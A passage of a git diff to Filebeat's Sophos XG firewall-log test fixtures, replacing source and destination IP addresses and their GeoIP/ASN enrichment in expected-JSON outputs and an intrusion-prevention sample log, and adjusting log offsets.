vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0",
         "event.outcome": "success",
         "event.severity": "6",
         "event.start": "2020-05-18T14:38:38.000-02:00",
@@ -163,7 +138,7 @@
         "host.name": "some_other_host.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 986,
+        "log.offset": 983,
         "network.bytes": 0,
         "network.direction": "outbound",
         "network.packets": 0,
@@ -181,8 +156,8 @@
             "some_other_host.local"
         ],
         "related.ip": [
-            "172.16.66.155",
             "185.8.209.194",
+            "67.43.156.12",
             "91.228.165.117"
         ],
         "rule.id": "67",
@@ -214,18 +189,14 @@
         "sophos.xg.priority": "Information",
         "sophos.xg.src_country_code": "R1",
         "sophos.xg.status": "Allow",
-        "source.as.number": 199567,
-        "source.as.organization.name": "Fr. Sauter AG",
+        "source.as.number": 35908,
         "source.bytes": 0,
-        "source.geo.city_name": "Saint-Prex",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "CH",
-        "source.geo.country_name": "Switzerland",
-        "source.geo.location.lat": 46.4796,
-        "source.geo.location.lon": 6.4599,
-        "source.geo.region_iso_code": "CH-VD",
-        "source.geo.region_name": "Vaud",
-        "source.ip": "172.16.66.155",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.mac": "00:00:00:00:00:00",
         "source.nat.ip": "185.8.209.194",
         "source.nat.port": 0,
@@ -272,7 +243,7 @@
         "host.name": "my_fancy_host",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 1975,
+        "log.offset": 1971,
         "network.bytes": 0,
         "network.packets": 0,
         "network.transport": "tcp",
@@ -358,7 +329,7 @@
         "host.name": "my_fancy_host",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 2871,
+        "log.offset": 2867,
         "network.bytes": 0,
         "network.packets": 0,
         "network.transport": "tcp",
@@ -416,19 +387,12 @@
     {
         "@timestamp": "2020-05-18T14:38:41.000-02:00",
         "client.bytes": 0,
-        "client.ip": "51.77.56.9",
+        "client.ip": "67.43.156.12",
         "client.mac": "c4:f7:d5:b5:47:f4",
         "client.nat.port": 0,
         "client.packets": 0,
         "client.port": 55039,
-        "destination.as.number": 42652,
-        "destination.as.organization.name": "inexio Informationstechnologie und Telekommunikation Gmbh",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "DE",
-        "destination.geo.country_name": "Germany",
-        "destination.geo.location.lat": 51.2993,
-        "destination.geo.location.lon": 9.491,
         "destination.ip": "185.7.209.207",
         "destination.nat.port": 0,
         "destination.packets": 0,
@@ -443,7 +407,7 @@
         "event.end": "2020-05-18T14:38:41.000-02:00",
         "event.kind": "event",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:41 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010302602002 log_type=\"Firewall\" log_component=\"Appliance Access\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port2\" out_interface=\"\" src_mac=c4:f7:d5:b5:47:f4 src_ip=51.77.56.9 src_country_code=\"\" dst_ip=185.7.209.207 dst_country_code=\"\" protocol=\"TCP\" src_port=55039 dst_port=18 sent_pkts=0  recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0",
+        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:41 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010302602002 log_type=\"Firewall\" log_component=\"Appliance Access\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port2\" out_interface=\"\" src_mac=c4:f7:d5:b5:47:f4 src_ip=67.43.156.12 src_country_code=\"\" dst_ip=185.7.209.207 dst_country_code=\"\" protocol=\"TCP\" src_port=55039 dst_port=18 sent_pkts=0  recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0",
         "event.outcome": "success",
         "event.severity": "6",
         "event.start": "2020-05-18T14:38:41.000-02:00",
@@ -456,7 +420,7 @@
         "host.name": "some_other_host.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 3784,
+        "log.offset": 3780,
         "network.bytes": 0,
         "network.packets": 0,
         "network.transport": "tcp",
@@ -470,7 +434,7 @@
         ],
         "related.ip": [
             "185.7.209.207",
-            "51.77.56.9"
+            "67.43.156.12"
         ],
         "rule.id": "0",
         "rule.ruleset": "0",
@@ -495,18 +459,14 @@
         "sophos.xg.message_id": "02002",
         "sophos.xg.priority": "Information",
         "sophos.xg.status": "Deny",
-        "source.as.number": 16276,
-        "source.as.organization.name": "OVH SAS",
+        "source.as.number": 35908,
         "source.bytes": 0,
-        "source.geo.city_name": "Warsaw",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "PL",
-        "source.geo.country_name": "Poland",
-        "source.geo.location.lat": 52.25,
-        "source.geo.location.lon": 21.0,
-        "source.geo.region_iso_code": "PL-14",
-        "source.geo.region_name": "Mazovia",
-        "source.ip": "51.77.56.9",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.mac": "c4:f7:d5:b5:47:f4",
         "source.nat.port": 0,
         "source.packets": 0,
@@ -552,7 +512,7 @@
         "host.name": "my_fancy_host",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 4674,
+        "log.offset": 4672,
         "network.bytes": 0,
         "network.packets": 0,
         "network.transport": "tcp",
@@ -645,7 +605,7 @@
         "host.name": "some_other_host.local",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 5608,
+        "log.offset": 5606,
         "network.bytes": 0,
         "network.packets": 0,
         "network.transport": "udp",
@@ -730,7 +690,7 @@
         "host.name": "my_fancy_host",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 6492,
+        "log.offset": 6490,
         "network.bytes": 0,
         "network.packets": 0,
         "network.transport": "tcp",
@@ -816,7 +776,7 @@
         "host.name": "my_fancy_host",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 7360,
+        "log.offset": 7358,
         "network.bytes": 0,
         "network.direction": "internal",
         "network.packets": 0,
@@ -914,7 +874,7 @@
         "host.name": "some_other_host.local",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 8335,
+        "log.offset": 8333,
         "network.bytes": 0,
         "network.packets": 0,
         "network.transport": "icmp",
@@ -1002,7 +962,7 @@
         "host.name": "some_other_host.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 9256,
+        "log.offset": 9254,
         "network.bytes": 3534,
         "network.packets": 12,
         "network.transport": "tcp",
@@ -1064,15 +1024,16 @@
         "client.nat.port": 0,
         "client.packets": 0,
         "client.port": 1353,
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.nat.port": 0,
         "destination.packets": 0,
         "destination.port": 0,
@@ -1086,7 +1047,7 @@
         "event.end": "2018-05-30T13:26:37.000-02:00",
         "event.kind": "event",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2018-05-30 time=13:26:37 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010202601001 log_type=\"Firewall\" log_component=\"Invalid Traffic\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol=\"UDP\" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"Invalid UDP destination.\" appresolvedby=\" Signature\"",
+        "event.original": "device=\"SFW\" date=2018-05-30 time=13:26:37 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010202601001 log_type=\"Firewall\" log_component=\"Invalid Traffic\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol=\"UDP\" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"Invalid UDP destination.\" appresolvedby=\" Signature\"",
         "event.outcome": "success",
         "event.severity": "6",
         "event.start": "2018-05-30T13:26:37.000-02:00",
@@ -1099,7 +1060,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 10196,
+        "log.offset": 10194,
         "network.bytes": 0,
         "network.packets": 0,
         "network.transport": "udp",
@@ -1112,12 +1073,12 @@
         ],
         "related.ip": [
             "10.198.32.19",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "rule.id": "0",
         "rule.ruleset": "0",
         "server.bytes": 0,
-        "server.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
         "server.nat.port": 0,
         "server.packets": 0,
         "server.port": 0,
@@ -1182,7 +1143,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 11056,
+        "log.offset": 11059,
         "network.bytes": 0,
         "network.packets": 0,
         "network.transport": "0",
@@ -1264,7 +1225,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 11884,
+        "log.offset": 11887,
         "network.bytes": 0,
         "network.packets": 0,
         "network.transport": "udp",
@@ -1350,7 +1311,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 12754,
+        "log.offset": 12757,
         "network.bytes": 0,
         "network.packets": 0,
         "network.transport": "tcp",
@@ -1432,7 +1393,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 13610,
+        "log.offset": 13613,
         "network.bytes": 0,
         "network.packets": 0,
         "network.transport": "icmp",
@@ -1486,15 +1447,16 @@
         "client.nat.port": 0,
         "client.packets": 0,
         "client.port": 1571,
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.nat.port": 0,
         "destination.packets": 0,
         "destination.port": 80,
@@ -1509,7 +1471,7 @@
         "event.end": "2018-05-31T17:05:14.000-02:00",
         "event.kind": "alert",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2018-05-31 time=17:05:14 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010602605001 log_type=\"Firewall\" log_component=\"Source Routed\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=8.8.8.8 dst_country_code= protocol=\"TCP\" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"",
+        "event.original": "device=\"SFW\" date=2018-05-31 time=17:05:14 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010602605001 log_type=\"Firewall\" log_component=\"Source Routed\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol=\"TCP\" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"",
         "event.outcome": "success",
         "event.severity": "6",
         "event.start": "2018-05-31T17:05:14.000-02:00",
@@ -1522,7 +1484,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 14452,
+        "log.offset": 14455,
         "network.bytes": 0,
         "network.packets": 0,
         "network.transport": "tcp",
@@ -1535,12 +1497,12 @@
         ],
         "related.ip": [
             "10.198.12.19",
-            "8.8.8.8"
+            "175.16.199.1"
         ],
         "rule.id": "1",
         "rule.ruleset": "1",
         "server.bytes": 0,
-        "server.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
         "server.nat.port": 0,
         "server.packets": 0,
         "server.port": 80,
@@ -1605,7 +1567,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 15286,
+        "log.offset": 15294,
         "network.bytes": 0,
         "network.packets": 0,
         "network.transport": "udp",
@@ -1688,7 +1650,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 16158,
+        "log.offset": 16166,
         "network.bytes": 0,
         "network.packets": 0,
         "network.transport": "icmp",
@@ -1745,17 +1707,7 @@
         "client.mac": "08:00:27:4c:49:e3",
         "client.nat.port": 0,
         "client.packets": 0,
-        "destination.as.number": 109,
-        "destination.as.organization.name": "Cisco Systems, Inc.",
         "destination.bytes": 0,
-        "destination.geo.city_name": "Richardson",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 32.9473,
-        "destination.geo.location.lon": -96.7028,
-        "destination.geo.region_iso_code": "US-TX",
-        "destination.geo.region_name": "Texas",
         "destination.ip": "72.163.4.185",
         "destination.nat.port": 0,
         "destination.packets": 0,
@@ -1783,7 +1735,7 @@
         "host.name": "firewall.localgroup.local",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 17024,
+        "log.offset": 17032,
         "network.bytes": 0,
         "network.packets": 0,
         "network.transport": "icmp",
diff --git a/x-pack/filebeat/module/sophos/xg/test/idp.log b/x-pack/filebeat/module/sophos/xg/test/idp.log
index dd9e406f0774..818b057ba8fb 100644
--- a/x-pack/filebeat/module/sophos/xg/test/idp.log
+++ b/x-pack/filebeat/module/sophos/xg/test/idp.log
@@ -1,6 +1,6 @@
-<30>device="SFW" date=2020-05-18 time=14:38:54 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=1881 signature_msg="SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack" classification="access to a potentially vulnerable web application" rule_priority=2 src_ip=89.40.182.58 src_country_code=ROU dst_ip=172.16.68.20 dst_country_code=R1 protocol="TCP" src_port=41528 dst_port=80 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="server-webapp" target="Server"
-<30>device="SFW" date=2020-05-18 time=14:38:55 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name="" signature_id=1616 signature_msg="PROTOCOL-DNS named version attempt" classification="Attempted Information Leak" rule_priority=1 src_ip=117.50.11.192 src_country_code=CHN dst_ip=172.16.66.155 dst_country_code=R1 protocol="UDP" src_port=58914 dst_port=53 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="protocol-dns" target="Server"
-<30>device="SFW" date=2020-05-18 time=14:38:56 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=53589 signature_msg="SERVER-WEBAPP DrayTek multiple products command injection attempt" classification="Web Application Attack" rule_priority=2 src_ip=77.61.185.101 src_country_code=NLD dst_ip=172.16.68.20 dst_country_code=R1 protocol="TCP" src_port=59476 dst_port=80 platform="Linux,Mac,Other,Unix,Windows" category="server-webapp" target="Server"
+<30>device="SFW" date=2020-05-18 time=14:38:54 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=1881 signature_msg="SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack" classification="access to a potentially vulnerable web application" rule_priority=2 src_ip=67.43.156.12 src_country_code=ROU dst_ip=172.16.68.20 dst_country_code=R1 protocol="TCP" src_port=41528 dst_port=80 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="server-webapp" target="Server"
+<30>device="SFW" date=2020-05-18 time=14:38:55 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name="" signature_id=1616 signature_msg="PROTOCOL-DNS named version attempt" classification="Attempted Information Leak" rule_priority=1 src_ip=89.160.20.156 src_country_code=CHN dst_ip=67.43.156.12 dst_country_code=R1 protocol="UDP" src_port=58914 dst_port=53 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="protocol-dns" target="Server"
+<30>device="SFW" date=2020-05-18 time=14:38:56 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=53589 signature_msg="SERVER-WEBAPP DrayTek multiple products command injection attempt" classification="Web Application Attack" rule_priority=2 src_ip=67.43.156.12 src_country_code=NLD dst_ip=172.16.68.20 dst_country_code=R1 protocol="TCP" src_port=59476 dst_port=80 platform="Linux,Mac,Other,Unix,Windows" category="server-webapp" target="Server"
 <30>device="SFW" date=2018-05-23 time=16:20:34 timezone="BST" device_name="XG750" device_id=SFDemo-f64dd6be log_id=020703406001 log_type="IDP" log_component="Anomaly" log_subtype="Detect" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name="" signature_id=26022 signature_msg="FILE-PDF EmbeddedFile contained within a PDF" classification="A Network Trojan was detected" rule_priority=1 src_ip=10.0.0.168 src_country_code=R1 dst_ip=10.1.1.234 dst_country_code=R1 protocol="TCP" src_port=28938 dst_port=25 platform="Windows" category="Malware Communication" target="Server"
 <30>device="SFW" date=2018-05-23 time=16:16:43 timezone="BST" device_name="XG750" device_id=SFDemo-f64dd6be log_id=020704406002 log_type="IDP" log_component="Anomaly" log_subtype="Drop" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name="" signature_id=26022 signature_msg="FILE-PDF EmbeddedFile contained within a PDF" classification="A Network Trojan was detected" rule_priority=1 src_ip=10.0.1.31 src_country_code=R1 dst_ip=10.1.0.115 dst_country_code=R1 protocol="TCP" src_port=40140 dst_port=25 platform="Windows" category="Malware Communication" target="Server"
 
diff --git a/x-pack/filebeat/module/sophos/xg/test/idp.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/idp.log-expected.json
index 59caeaab67dc..de3cb1b31117 100644
--- a/x-pack/filebeat/module/sophos/xg/test/idp.log-expected.json
+++ b/x-pack/filebeat/module/sophos/xg/test/idp.log-expected.json
@@ -1,7 +1,7 @@
 [
     {
         "@timestamp": "2020-05-18T14:38:54.000-02:00",
-        "client.ip": "89.40.182.58",
+        "client.ip": "67.43.156.12",
         "client.port": 41528,
         "destination.ip": "172.16.68.20",
         "destination.port": 80,
@@ -14,7 +14,7 @@
         "event.dataset": "sophos.xg",
         "event.kind": "alert",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:54 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=1881 signature_msg=\"SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack\" classification=\"access to a potentially vulnerable web application\" rule_priority=2 src_ip=89.40.182.58 src_country_code=ROU dst_ip=172.16.68.20 dst_country_code=R1 protocol=\"TCP\" src_port=41528 dst_port=80 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"server-webapp\" target=\"Server\"",
+        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:54 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=1881 signature_msg=\"SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack\" classification=\"access to a potentially vulnerable web application\" rule_priority=2 src_ip=67.43.156.12 src_country_code=ROU dst_ip=172.16.68.20 dst_country_code=R1 protocol=\"TCP\" src_port=41528 dst_port=80 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"server-webapp\" target=\"Server\"",
         "event.outcome": "success",
         "event.severity": "4",
         "event.timezone": "-02:00",
@@ -37,7 +37,7 @@
         ],
         "related.ip": [
             "172.16.68.20",
-            "89.40.182.58"
+            "67.43.156.12"
         ],
         "rule.category": "access to a potentially vulnerable web application",
         "rule.id": "1881",
@@ -60,14 +60,13 @@
         "sophos.xg.rule_priority": "2",
         "sophos.xg.src_country_code": "ROU",
         "sophos.xg.target": "Server",
-        "source.as.number": 28684,
-        "source.as.organization.name": "Bestnet Service SRL",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "RO",
-        "source.geo.country_name": "Romania",
-        "source.geo.location.lat": 46.0,
-        "source.geo.location.lon": 25.0,
-        "source.ip": "89.40.182.58",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.port": 41528,
         "tags": [
             "forwarded",
@@ -76,9 +75,15 @@
     },
     {
         "@timestamp": "2020-05-18T14:38:55.000-02:00",
-        "client.ip": "117.50.11.192",
+        "client.ip": "89.160.20.156",
         "client.port": 58914,
-        "destination.ip": "172.16.66.155",
+        "destination.as.number": 35908,
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.port": 53,
         "event.action": "drop",
         "event.category": [
@@ -89,7 +94,7 @@
         "event.dataset": "sophos.xg",
         "event.kind": "alert",
         "event.module": "sophos",
-        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:55 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name=\"\" signature_id=1616 signature_msg=\"PROTOCOL-DNS named version attempt\" classification=\"Attempted Information Leak\" rule_priority=1 src_ip=117.50.11.192 src_country_code=CHN dst_ip=172.16.66.155 dst_country_code=R1 protocol=\"UDP\" src_port=58914 dst_port=53 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"protocol-dns\" target=\"Server\"",
+        "event.original": "device=\"SFW\" date=2020-05-18 time=14:38:55 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name=\"\" signature_id=1616 signature_msg=\"PROTOCOL-DNS named version attempt\" classification=\"Attempted Information Leak\" rule_priority=1 src_ip=89.160.20.156 src_country_code=CHN dst_ip=67.43.156.12 dst_country_code=R1 protocol=\"UDP\" src_port=58914 dst_port=53 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"protocol-dns\" target=\"Server\"",
         "event.outcome": "success",
         "event.severity": "4",
         "event.timezone": "-02:00",
@@ -111,13 +116,13 @@
             "my_fancy_host"
         ],
         "related.ip": [
-            "117.50.11.192",
-            "172.16.66.155"
+            "67.43.156.12",
+            "89.160.20.156"
         ],
         "rule.category": "Attempted Information Leak",
         "rule.id": "1616",
         "rule.name": "PROTOCOL-DNS named version attempt",
-        "server.ip": "172.16.66.155",
+        "server.ip": "67.43.156.12",
         "server.port": 53,
         "service.type": "sophos",
         "sophos.xg.category": "protocol-dns",
@@ -135,16 +140,17 @@
         "sophos.xg.rule_priority": "1",
         "sophos.xg.src_country_code": "CHN",
         "sophos.xg.target": "Server",
-        "source.as.number": 4808,
-        "source.as.organization.name": "China Unicom Beijing Province Network",
-        "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 31.0449,
-        "source.geo.location.lon": 121.4012,
-        "source.geo.region_iso_code": "CN-SH",
-        "source.geo.region_name": "Shanghai",
-        "source.ip": "117.50.11.192",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "source.port": 58914,
         "tags": [
             "forwarded",
@@ -153,7 +159,7 @@
     },
     {
         "@timestamp": "2020-05-18T14:38:56.000-02:00",
-        "client.ip": "77.61.185.101",
+        "client.ip": "67.43.156.12",
         "client.port": 59476,
         "destination.ip": "172.16.68.20",
         "destination.port": 80,
@@ -166,7 +172,7 @@
         "event.dataset": "sophos.xg",
         "event.kind": "alert",
         "event.module": "sophos",
